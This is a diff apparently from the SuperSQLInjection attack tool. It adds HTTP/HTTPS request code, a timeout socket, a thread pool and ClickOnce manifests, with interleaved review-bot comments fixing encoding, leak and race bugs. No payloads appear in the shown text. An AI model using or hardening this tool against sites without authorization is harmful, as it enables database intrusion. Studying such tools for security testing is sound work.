1); 
+ if (len <= 0) + { + Thread.Sleep(WaitTime); + } + ctmp += Encoding.UTF8.GetString(chunkedByte); + + } while (ctmp.IndexOf(CT) == -1 && sw.ElapsedMilliseconds < timeout); + + chunkedSize = Tools.convertToIntBy16(ctmp.Replace(CT, "")); + + //chunked的结束0\r\n\r\n是结束标志,单个chunked块\r\n结束 + if (ctmp.Equals(CT)) + { + continue; + } + if (chunkedSize == 0) + { + //结束了 + break; + } + int onechunkLen = 0; + + while (onechunkLen < chunkedSize && sw.ElapsedMilliseconds < timeout) + { + len = ssl.Read(responseBody, sum, chunkedSize - onechunkLen); + if (len > 0) + { + onechunkLen += len; + sum += len; + } + if (len <= 0 && onechunkLen < chunkedSize) + { + Thread.Sleep(WaitTime); + } + } + + //判断 + } while (sw.ElapsedMilliseconds < timeout); + } + //connection close方式或未知body长度 + else + { + while (sw.ElapsedMilliseconds < timeout) + { + if (clientSocket.Client.Poll(timeout, SelectMode.SelectRead)) + { + if (clientSocket.Available > 0) + { + len = ssl.Read(responseBody, sum, (1024 * 200) - sum); + if (len > 0) + { + sum += len; + } + else + { + Thread.Sleep(WaitTime); + } + } + else + { + break; + } + } + } + } + //自动识别编码 + if (AutoGetEncoding.Equals(encoding)) + { + if (!String.IsNullOrEmpty(server.encoding)) + { + encoding = server.encoding;//header找到编码 + } + else { + encoding = DefaultEncoding;//默认一个编码 + isupdateEncoding = true;//body找编码 + } + Encoding encod = Encoding.GetEncoding(encoding); + getBody(ref server, ref responseBody, ref sum, ref encod, ref index); + //修正编码 + if (isupdateEncoding) + { + String cEncoding = getHTMLEncoding("", server.body); + if (!String.IsNullOrEmpty(cEncoding)) + { + server.encoding = cEncoding;//body找到编码 + getBody(ref server, ref responseBody, ref sum, ref encod, ref index); + } + + } + } + else { + //指定编码 + Encoding encod = Encoding.GetEncoding(encoding); + getBody(ref server, ref responseBody, ref sum, ref encod, ref index); + } + } + + } + catch (Exception e) + { + Exception ee = new Exception("HTTPS发包错误!错误消息:" + e.Message + "----发包编号:" + 
index); + if (ee.Message.IndexOf("doHeader") != -1) { + String a=e.Message; + } + throw ee; + } + finally + { + sw.Stop(); + server.length = sum; + server.runTime = (int)sw.ElapsedMilliseconds; + + if (clientSocket != null) + { + clientSocket.Close(); + } + + if (main.config.isOpenHTTPLog) + { + server.sleepTime = main.config.sendHTTPSleepTime; + Tools.sysHTTPLog(index, server); + main.Invoke(new Main.sendHTTPLogDelegate(main.sendHTTPLog), index, server, payload); + } + if (main.config.sendHTTPSleepTime > 0) + { + Thread.Sleep(main.config.sendHTTPSleepTime); + } + } + return server; + + } + + public static String unGzip(byte[] data, int len, Encoding encoding,String index) + { + + String str = ""; + MemoryStream ms = new MemoryStream(data, 0, len); + GZipStream gs = new GZipStream(ms, CompressionMode.Decompress); + MemoryStream outbuf = new MemoryStream(); + byte[] block = new byte[1024]; + + try + { + while (true) + { + int bytesRead = gs.Read(block, 0, block.Length); + if (bytesRead <= 0) + { + break; + } + else + { + outbuf.Write(block, 0, bytesRead); + } + } + str = encoding.GetString(outbuf.ToArray()); + } + catch (Exception e) + { + Tools.SysLog("解压Gzip发生异常----" + e.Message+"----"+ index); + + } + finally + { + outbuf.Close(); + gs.Close(); + ms.Close(); + + } + return str; + + } + + public static String unDeflate(byte[] data, int len, Encoding encoding, String index) + { + + String str = ""; + MemoryStream ms = new MemoryStream(data, 0, len); + DeflateStream ds = new DeflateStream(ms, CompressionMode.Decompress); + MemoryStream outbuf = new MemoryStream(); + byte[] block = new byte[1024]; + + try + { + while (true) + { + int bytesRead = ds.Read(block, 0, block.Length); + if (bytesRead <= 0) + { + break; + } + else + { + outbuf.Write(block, 0, bytesRead); + } + } + str = encoding.GetString(outbuf.ToArray()); + } + catch (Exception e) + { + Tools.SysLog("解压deflate发生异常----" + e.Message + "----" + index); + + } + finally + { + outbuf.Close(); + ds.Close(); + 
ms.Close(); + + } + return str; + + } + + + public String SetCookies(string sHtml, String sCookies) + { + + //Set-Cookie: b_110128=0; domain=.qidian.com; expires=Fri, 15-Sep-2023 15:48:41 GMT; path=/ + + string sName = ""; + + string sValue = ""; + + MatchCollection mc; + + Match m; + + Regex r; + + if (!sCookies.EndsWith(";") && sCookies != "") + { + + sCookies += ";"; + + } + + r = new Regex("Set-Cookie:\\s*(?.*?)=(?.*?);", RegexOptions.Compiled | RegexOptions.Singleline | RegexOptions.IgnoreCase); + + mc = r.Matches(sHtml); + + for (int i = 0; i < mc.Count; i++) + { + + sName = mc[i].Groups["sName"].Value.Trim(); + + sValue = mc[i].Groups["sValue"].Value.Trim(); + + r = new Regex(sName + "\\s*=\\s*.*?;", RegexOptions.Compiled | RegexOptions.Singleline | RegexOptions.IgnoreCase); + + m = r.Match(sCookies); + + if (m.Success) + { + + sCookies = sCookies.Replace(m.Value, sName + "=" + sValue + ";"); + + } + + else + { + + sCookies += sName + "=" + sValue + ";"; + + } + + } + + try + { + + if (sCookies.StartsWith(";")) + { + + sCookies = sCookies.Substring(1, sCookies.Length - 1); + + } + + } + + catch + { + + } + return sCookies; + + } + + public static String getHTMLEncoding(String header, String body) + { + if (String.IsNullOrEmpty(header)&& String.IsNullOrEmpty(body)) + { + return ""; + } + body = body.ToUpper(); + + String encode = ""; + Match m = Regex.Match(header, @"charset=(?[\w\-]+)", RegexOptions.IgnoreCase); + if (m.Success) + { + encode=m.Groups["charset"].Value.ToUpper(); + } + else + { + if (String.IsNullOrEmpty(body)) + { + return ""; + } + m = Regex.Match(body, @"charset=['""]{0,1}(?[\w\-]+)['""]{0,1}", RegexOptions.IgnoreCase); + if (m.Success) + { + encode=m.Groups["charset"].Value.ToUpper(); + } + } + if ("UTF8".Equals(encode)) { + encode = "UTF-8"; + } + return encode; + + + } + } +} \ No newline at end of file 
diff --git a/SuperSQLInjection/tools/http/HTTPRequest.cs b/SuperSQLInjection/tools/http/HTTPRequest.cs
new file mode 100644
index 0000000..95409f1
--- /dev/null
+++ b/SuperSQLInjection/tools/http/HTTPRequest.cs
@@ -0,0 +1,135 @@
+using model;
+using System;
+using System.Collections.Generic;
+using System.IO;
+using System.Net;
+using System.Text;
+using System.Text.RegularExpressions;
+using tools;
+
+namespace SuperSQLInjection.tools
+{
+ class HTTPRequest
+ {
+ public static ServerInfo getHtmlByPost(String url, String data,String referer,String cookies)
+ {
+ ServerInfo server = new ServerInfo();
+ HttpWebResponse response = null;
+ StreamReader sr = null;
+ HttpWebRequest request = null;
+
+ try
+ {
+ //设置模拟http访问参数
+ Uri uri = new Uri(url);
+ request = (HttpWebRequest)WebRequest.Create(uri);
+ request.Method = "POST";
+ request.UserAgent = "Mozilla/5.0";
+ request.ContentType = "application/x-www-form-urlencoded";
+ request.Timeout = 30000;
+ request.KeepAlive = true;
+ if (referer != null) {
+ request.Referer = referer;
+ }
+ request.AllowAutoRedirect = false;
+ if (!"".Equals(cookies))
+ {
+ request.Headers.Add("Cookie", cookies);
+ }
+ byte[] bydata = Encoding.ASCII.GetBytes(data);
+ request.ContentLength = bydata.Length;
+ Stream reqStream = request.GetRequestStream();
+ reqStream.Write(bydata, 0, bydata.Length);
+ reqStream.Close();
+ response = (HttpWebResponse)request.GetResponse();
+ CookieCollection cc = response.Cookies;
+ StreamReader str = new StreamReader(response.GetResponseStream());
+ server.body= str.ReadToEnd();
+ server.cookies = response.Headers["Set-Cookie"];
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (sr != null)
+ {
+ sr.Close();
+ }
+ if (response != null)
+ {
+ response.Close();
+ }
+ if (request != null)
+ {
+ request.Abort();
+ }
+ }
+ return server;
+ }
+ public static String getHTMLEncoding(String header)
+ {
+
+ Match m = Regex.Match(header, "charset=\\S{0,8}\"");
+ if (m.Success)
+ {
+ return m.Groups[0].Value.Replace("charset=", "").Replace("\"", "");
+ }
+ return "";
+ }
+ public static ServerInfo getHtml(String url,String referer,String cookies)
+ {
+ ServerInfo server = new ServerInfo();
+ HttpWebResponse response = null;
+ StreamReader sr = null;
+ HttpWebRequest request = null;
+ try
+ {
+
+ //设置模拟http访问参数
+ Uri uri = new Uri(url);
+ request = (HttpWebRequest)WebRequest.Create(uri);
+ request.Accept = "*/*";
+ request.Method = "GET";
+ request.Timeout = 30000;
+ request.AllowAutoRedirect = false;
+ if (referer != null)
+ {
+ request.Referer = referer;
+ }
+ if (!"".Equals(cookies))
+ {
+ request.Headers.Add("Cookie", cookies);
+ }
+ response = (HttpWebResponse)request.GetResponse();
+ sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
+
+ //读取服务器端返回的消息
+ server.body = sr.ReadToEnd();
+ server.cookies = response.Headers["Set-Cookie"];
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (sr != null)
+ {
+ sr.Close();
+ }
+ if (response != null)
+ {
+ response.Close();
+ }
+ if (request != null)
+ {
+ request.Abort();
+ }
+ }
+ return server;
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/http/HttpTools.cs b/SuperSQLInjection/tools/http/HttpTools.cs
new file mode 100644
index 0000000..d7b883d
--- /dev/null
+++ b/SuperSQLInjection/tools/http/HttpTools.cs
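Review bot: In HTTPRequest.cs, `getHtmlByPost` encodes the request body with `Encoding.ASCII.GetBytes(data)`, which silently replaces every non-ASCII character with `?`, so the bytes sent differ from the string the caller passed; `byte[] bydata = Encoding.UTF8.GetBytes(data);` keeps them and `ContentLength` is still taken from the array. In the same method the reader is bound to a new local `str` while `sr` stays null, so the `sr.Close()` in `finally` is dead code; assigning `sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8);` as `getHtml` does makes the two methods consistent. Both methods also catch every `Exception`, log only `e.Message` and return an empty `ServerInfo`, so a caller cannot tell a failed request from an empty response.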
@@ -0,0 +1,70 @@
+using System;
+using System.Collections.Generic;
+using System.Text;
+using System.Net;
+using System.IO;
+using System.Net.Sockets;
+using System.Text.RegularExpressions;
+using model;
+using System.Threading;
+
+namespace tools
+{
+
+ class HttpTools
+ {
+ public static String getHTMLEncoding(String header){
+
+ Match m=Regex.Match(header, "charset=\\S{0,8}\"");
+ if (m.Success) {
+ return m.Groups[0].Value.Replace("charset=","").Replace("\"","");
+ }
+ return "";
+ }
+ public static String getHtml(String url, int timeout)
+ {
+ String html = "";
+ HttpWebResponse response = null;
+ StreamReader sr = null;
+ HttpWebRequest request = null;
+ try
+ {
+
+ //设置模拟http访问参数
+ Uri uri = new Uri(url);
+ request = (HttpWebRequest)WebRequest.Create(uri);
+ request.Accept = "*/*";
+ request.Method = "GET";
+ request.Timeout = timeout * 1000;
+ request.AllowAutoRedirect = false;
+ response = (HttpWebResponse)request.GetResponse();
+ sr = new StreamReader(response.GetResponseStream(), Encoding.UTF8);
+
+ //读取服务器端返回的消息
+ html = sr.ReadToEnd();
+
+ }
+ catch (Exception e)
+ {
+ Tools.SysLog(e.Message);
+ }
+ finally
+ {
+ if (sr != null)
+ {
+ sr.Close();
+ }
+ if (response != null)
+ {
+ response.Close();
+ }
+ if (request != null)
+ {
+ request.Abort();
+ }
+ }
+ return html;
+ }
+
+ }
+}
diff --git a/SuperSQLInjection/tools/http/TimeOutSocket.cs b/SuperSQLInjection/tools/http/TimeOutSocket.cs
new file mode 100644
index 0000000..cf29be5
--- /dev/null
+++ b/SuperSQLInjection/tools/http/TimeOutSocket.cs
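Review bot: The pattern in `HttpTools.getHTMLEncoding`, `"charset=\\S{0,8}\""`, requires a closing double quote and allows at most eight characters before it, so an unquoted value such as `charset=utf-8` at the end of a header and longer names such as `windows-1252` are not matched and the method returns `""`. Something like `Regex.Match(header, @"charset=[""']?([\w\-]+)", RegexOptions.IgnoreCase)` with `return m.Groups[1].Value;` covers both cases. The same method appears verbatim in HTTPRequest.cs in this commit and would be better kept in one place. `getHtml` never calls it and decodes every body as UTF-8, which is worth a one-line comment if that is intended.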
@@ -0,0 +1,72 @@
+using System;
+using System.Collections.Generic;
+using System.Diagnostics;
+using System.Net;
+using System.Net.Sockets;
+using System.Text;
+using System.Threading;
+
+namespace SuperSQLInjection.tools.http
+{
+ class TimeOutSocket
+ {
+ private bool IsConnectionSuccessful = false;
+ private Exception socketexception =null;
+ private ManualResetEvent TimeoutObject = new ManualResetEvent(false);
+ public int useTime = 0;
+ public TcpClient Connect(String host,int port,int timeoutMSec)
+ {
+ Stopwatch sw = new Stopwatch();
+ sw.Start();
+ TimeoutObject.Reset();
+ socketexception = null;
+
+ TcpClient tcpclient = new TcpClient();
+
+ tcpclient.BeginConnect(host, port,new AsyncCallback(CallBackMethod), tcpclient);
+
+
+ if (TimeoutObject.WaitOne(timeoutMSec, false))
+ {
+ if (IsConnectionSuccessful)
+ {
+ sw.Stop();
+ useTime = (int)sw.ElapsedMilliseconds;
+ return tcpclient;
+ }
+ else
+ {
+ throw socketexception;
+ }
+ }
+ else
+ {
+ tcpclient.Close();
+ throw new TimeoutException("TimeOut Exception");
+ }
+ }
+ private void CallBackMethod(IAsyncResult asyncresult)
+ {
+ try
+ {
+ IsConnectionSuccessful = false;
+ TcpClient tcpclient = asyncresult.AsyncState as TcpClient;
+
+ if (tcpclient.Client != null)
+ {
+ tcpclient.EndConnect(asyncresult);
+ IsConnectionSuccessful = true;
+ }
+ }
+ catch (Exception ex)
+ {
+ IsConnectionSuccessful = false;
+ socketexception = ex;
+ }
+ finally
+ {
+ TimeoutObject.Set();
+ }
+ }
+ }
+}
diff --git a/SuperSQLInjection/tools/thread/MyThreadPool.cs b/SuperSQLInjection/tools/thread/MyThreadPool.cs
new file mode 100644
index 0000000..e6ff423
--- /dev/null
+++ b/SuperSQLInjection/tools/thread/MyThreadPool.cs
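Review bot: In `TimeOutSocket.Connect`, only the timeout branch calls `tcpclient.Close()`; when `CallBackMethod` records a failure the method goes straight to `throw socketexception;` and the `TcpClient` it created is never closed. `sendRequestRetry` elsewhere in this commit retries after every exception, so each refused connection can leave another unclosed client behind until finalization. Adding `tcpclient.Close();` on the line before `throw socketexception;` releases it on that path as well.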
@@ -0,0 +1,134 @@ +using System; +using System.Collections.Generic; +using System.Text; +using System.Threading; +using tools; +using System.Collections; + +namespace SuperSQLInjection.tools +{ + class MyThreadPool + { + public static int maxThread = 1; + public static String tname = "ThreadPool-"; + public static ArrayList threads = new ArrayList(); + public static Thread cth = null; + public static AutoResetEvent _autoResetEvent = new AutoResetEvent(true); + public static void setMaxThread(int maxTh) + { + maxThread = maxTh; + cth = new Thread(clearThread); + cth.Start(); + + } + public static int getCurrentThreadCount() + { + return threads.Count; + + } + + public static void clearThread() + { + while (true) + { + lock (threads.SyncRoot) + { + for (int i = 0; i < threads.Count; i++) + { + + if (threads.Count <= 0) + { + + break; + } + Thread cth = (Thread)threads[i]; + if (cth.IsAlive == false) + { + threads.Remove(cth); + _autoResetEvent.Set(); + } + } + } + Thread.Sleep(10); + } + } + + public static void killAllThread() + { + + lock (threads.SyncRoot) + { + for (int i = 0; i < threads.Count; i++) + { + + if (threads.Count <= 0) + { + + break; + } + + Thread cth = (Thread)threads[i]; + cth.Abort(); + } + } + } + + public static void initThread(ParameterizedThreadStart ps, Object obj, String name) + { + while (Main.status == 1) + { + if (threads.Count < maxThread && Main.status == 1) + { + Thread th = new Thread(ps); + th.Name = tname ; + th.IsBackground = true; + lock (threads.SyncRoot) + { + threads.Add(th); + } + + th.Start(obj); + break; + } + _autoResetEvent.WaitOne(); + } + } + + public static void initThread(ParameterizedThreadStart ps, Object obj) + { + while (Main.status == 1) + { + if (threads.Count < maxThread && Main.status == 1) + { + Thread th = new Thread(ps); + th.IsBackground = true; + th.Name = tname; + lock (threads.SyncRoot) + { + threads.Add(th); + } + th.Start(obj); + break; + } + Thread.Sleep(10); + } + } + + public static int 
GetAliveThreadsCount() + { + + /* + foreach (Thread th in threads) + { + if (th.IsAlive) + { + count++; + + } + }*/ + return threads.Count; + } + + } + +} \ No newline at end of file diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.application b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.application new file mode 100644 index 0000000..dc7e66f --- /dev/null +++ b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.application @@ -0,0 +1,21 @@ + + + + + + + + + + + + + + + + + gAs/TyknF/4dNgKirgeCy0VQSBk= + + + +oaT56oKuR3alD/PZ79QRFQqsr/4=qMuGCX/i2pzV4msE+YGr7UxOYPngnpJZR2tYM6X2g0xMFU1afxsbf+XYJm2dZQYMQGx1jrnJqvssyWSkLYMNojXyDq6k/3TvcM/t/s2ZvJCz/GWXQckrvMejD2OHukR7ETyctizeIuWXgvQGyYZXG1jY+nB2hYI/h8tYxtv8W78=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABCN=DESKTOP-T009CQE\shack2m6wWY1yfDMQPe+z3uaqSAkxql5U=gYBpuAu5h+mOxWNHvJ/yAPmde9Z0iKr4f2TTQqrWb8IZHqt8zJYfxi0Kh7PLFaf+lNrnbCyM/nQLKK7HBHifVRKIjCNJ9Po9utzrhylLj32I+2dnLd6+tjrH8v19U2rGdJ/aHeppWuSqwzUVnJ3oqbpjnNbmYaogdNCE9SVx/Jw=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=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 \ No newline at end of file diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.config.deploy b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.config.deploy new file mode 100644 index 0000000..e365603 --- /dev/null +++ b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.config.deploy @@ -0,0 +1,3 @@ + + + 
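Review bot: Both `initThread` overloads in MyThreadPool.cs test `threads.Count < maxThread` outside `lock (threads.SyncRoot)` and call `th.Start(obj)` only after releasing it, so two callers can pass the check together, and `clearThread` can remove a just-added thread whose `IsAlive` is still false; either way more than `maxThread` workers can run, which defeats the cap that is meant to bound the tool's parallel workers. The check, the `Add` and the `Start` belong in one locked section, as sketched below for the two-argument overload; the three-argument one needs the same change around its `_autoResetEvent.WaitOne()`. Separately, the three-argument overload ignores its `name` parameter, and `setMaxThread` starts another never-ending foreground `clearThread` thread on every call.

```csharp
public static void initThread(ParameterizedThreadStart ps, Object obj)
{
    while (Main.status == 1)
    {
        lock (threads.SyncRoot)
        {
            // Check the cap, register and start under one lock so that two callers
            // cannot both pass the check and clearThread never sees an unstarted thread.
            if (threads.Count < maxThread)
            {
                Thread th = new Thread(ps);
                th.IsBackground = true;
                th.Name = tname;
                threads.Add(th);
                th.Start(obj);
                return;
            }
        }
        Thread.Sleep(10);
    }
}
```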
diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.deploy b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.deploy new file mode 100644 index 0000000..853ecdb Binary files /dev/null and b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.deploy differ diff --git a/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.manifest b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.manifest new file mode 100644 index 0000000..a5963b5 --- /dev/null +++ b/SuperSQLInjection/发布/Application Files/SuperSQLInjection_2016_01_05_0/SuperSQLInjection.exe.manifest 
@@ -0,0 +1,81 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + MzoAOL5R6lPkke3HWwU+tccy9LI= + + + + + + + + + + cpzNzlRjZspwKGLNlX6RAlU3880= + + + + + + + + + + + + + + + + + +DggssPaMqM6CqgARrCO/pDw3Jfg=CTJF8DGXtEUhTfOmyO6oSrA40dGK9leO1ikDrxcwkL5xNZJyt73X/hfNiOfbK+Q0cQ4sQzALzgOgKb3LFneBb4MusIuwffTGkKbD6apSydOT1zT7pVkQiqyIXJfvKIF0j7PKcipmsrXnWJ+Ry6r8k0GPW9rsKiFI3WZTysJJHK8=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABCN=DESKTOP-T009CQE\shack2ELRpYqKy1OdgqVm1x1O5nixOwFA=EBm3PkvOqz/o/WnwEbAYz0rh3d7sTDvoJ/3LcCNOGIebqrMO2d1b+mUaMzMeHDmmKx93K2XqjebOqFhtrwLwg+0z6WMtvXGTBJjb+he5H/evWw3K+OYLGXsEogyGtNiVO8QyyUGn+C3vZSIJ2g2cAj45UBB/wVhLxT3Wr6F+OF8=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABMIIB8TCCAVqgAwIBAgIQTPcc6oMYorxGRkGiNt4vdDANBgkqhkiG9w0BAQUFADA3MTUwMwYDVQQDHiwARABFAFMASwBUAE8AUAAtAFQAMAAwADkAQwBRAEUAXABzAGgAYQBjAGsAMjAeFw0xNjAxMDUwNzA2MjVaFw0xNzAxMDQxMzA2MjVaMDcxNTAzBgNVBAMeLABEAEUAUwBLAFQATwBQAC0AVAAwADAAOQBDAFEARQBcAHMAaABhAGMAawAyMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC8ajhBRaB8Y3sT9/MWrI12BwbqKvOevWzRzQpPv1VDHJkAmtwDU4/1eVM0zWdWo3jHLosrssHHf3PFDpqHm956/FaTB4JM+p4PBDDzcxAdV69S08bMcxlMBXAysDjD7sU6GqTFaYydpYc6OO5un2afpJT6e5v+Y2JtfnCdJ7eMnQIDAQABMA0GCSqGSIb3DQEBBQUAA4GBAI20fV7Nk6dDe58PeVtblLeUBUBypvhh3ddnU6uO3+Fwv4KorSto6qtFq9uyzY/lPP/u5SQZmVBiZG7pK6vGfDhBt7PAtNoLgzsp7/wXXze7a8IwsAm8gmK0wmYtXK9IvS17UikTNWn9OS73AfvpR8SuzxPnvymkYBG2bsPqmRaj \ No newline at end of file diff --git a/SuperSQLInjection/发布/SuperSQLInjection.application b/SuperSQLInjection/发布/SuperSQLInjection.application new file mode 100644 index 0000000..dc7e66f --- /dev/null +++ b/SuperSQLInjection/发布/SuperSQLInjection.application 
@@ -0,0 +1,21 @@ + + + + + + + + + + + + + + + + + gAs/TyknF/4dNgKirgeCy0VQSBk= + + + +oaT56oKuR3alD/PZ79QRFQqsr/4=qMuGCX/i2pzV4msE+YGr7UxOYPngnpJZR2tYM6X2g0xMFU1afxsbf+XYJm2dZQYMQGx1jrnJqvssyWSkLYMNojXyDq6k/3TvcM/t/s2ZvJCz/GWXQckrvMejD2OHukR7ETyctizeIuWXgvQGyYZXG1jY+nB2hYI/h8tYxtv8W78=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=AQABCN=DESKTOP-T009CQE\shack2m6wWY1yfDMQPe+z3uaqSAkxql5U=gYBpuAu5h+mOxWNHvJ/yAPmde9Z0iKr4f2TTQqrWb8IZHqt8zJYfxi0Kh7PLFaf+lNrnbCyM/nQLKK7HBHifVRKIjCNJ9Po9utzrhylLj32I+2dnLd6+tjrH8v19U2rGdJ/aHeppWuSqwzUVnJ3oqbpjnNbmYaogdNCE9SVx/Jw=vGo4QUWgfGN7E/fzFqyNdgcG6irznr1s0c0KT79VQxyZAJrcA1OP9XlTNM1nVqN4xy6LK7LBx39zxQ6ah5veevxWkweCTPqeDwQw83MQHVevUtPGzHMZTAVwMrA4w+7FOhqkxWmMnaWHOjjubp9mn6SU+nub/mNibX5wnSe3jJ0=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 \ No newline at end of file